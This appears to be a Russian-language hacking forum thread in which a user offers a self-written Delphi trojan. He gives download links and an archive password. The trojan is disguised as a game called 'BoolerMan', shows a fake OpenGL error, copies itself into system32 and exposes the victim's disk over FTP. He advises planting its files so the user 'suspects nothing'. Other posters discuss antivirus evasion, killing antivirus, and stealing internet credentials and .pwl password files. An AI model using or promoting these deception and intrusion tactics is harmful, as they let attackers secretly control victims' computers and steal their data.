Короче можно челу закинуть и по его винту лазить.Самое приятное трой только что написан и его антивирал не палит И еще вещь прикольная там есть запускаешь потипу игры BoolerMan запускается (название сам придумал чтоб на игровое похоже было)А потом ошибка типа You mUst HAve OpenGL 3.2 Такого в природе нету ну чтобы юзер подумал а у меня 1.2 не пойдет значит Так вот он при запуске копируется в %systemroot%\system32 и там проживает Вы там файлик *.cmd и rus.dll и BoolerMan.exe одну директорию запихайте и пусть юзер запускает и ни о чем не догадывается Я туда еще библиотеку запихал с компонентами которые нужня для работы с исходниками. http://mrmorph.narod.ru/FTPTROY.rar вот линк Но вы не судите строго я писал её всего 2 дня и то вечером и на следующий день час всего так что могут быть и баги. Данная программа ни в коем случае не должна быть применена во вред она предназначена тока для ознакомления.
ИМХО плохой трой - надо писать так чтобы в процессах небыло и файла небыло он менял размер и закрывал все антивирусы - значит грузился как sys)) драйвер
На delphi он вроде пишет... Да если ламер то и такой трой пойдет тож =) Но скоро значит его будут антивирусы палить... KEZ ты пробовал его уже?
Почему ламер бля я его первый раз ваще писал подобие трояна Написан на дельфии и Я просил найти недочеты и пожелания и я его писал всега за 2 дня и то что всего потратил 2 часа так что я бы посмотрел как ты без задумки за 2 часа прогу написал и вот А с чего ты взял что я лам а?
Да не сердись ты )) Просто выразил свое мнение. Ты читал комменты на главной? Вот там реально обкладывают )) Нормальный троян. Просто мое представление о троянах не такое как у тебя - я считаю что если он не может закрыть антивирь или напрямую обратиться к памяти то это неинтересно)))
Kez там ваще СмертьЛамера тоже в процессах висит и Другие многие трояны точно так же а они его гораздо больше чем я! И Кстати Я НЕ ЛАМЕР я не знаю почему тут кое кто выдумал фантазер херов
гы гы а я сделал просто *** файл , и работает он почти также как и ваш трой , только его некогда не внесут в базу антивирей , потому что им предётся переписывать все винду . да и avp тоже , так как этот фай входит в сис файлы ") а весит он ВСЕГО 720 байт вот куул да но есть и свои промашки он всего лишь ворует инет , а потом самоудаляеться , но конечно и это можно исправить
потом ещё при поподании самого этого файла на комп он может произвести на удаленной машине все что вы ему приказали ( любой вредоносный и не очень код)
Ghost по сути их разговора я понял что Типа для ламера пойдет И к тому же люди не подразделяются на Ламеров и Хакеров(я так думаю) И кстати он ворует файл *.pwl да? т.к у других выней утянуть тяжело А название я так от балды взял ведь из чела ФТП сервак делается Это типа Название ФТПТРой проги))
http://xmorph.narod.ru/BoolerMan.rar во товарищи пасс от него antichat Кочайте на здоровье мой сайт полностью срубили гады =(
Кстати чувак, =)) я только что зашёл сюда, потому что обратил на "минус" в репутации... Я не имел ввиду что ты ламер, типа Kez написал что плохой, типа видно его, а я имел ввиду что если жертва ламер - то и такой пойдет, всмысле ламер не спалит его Не обижайся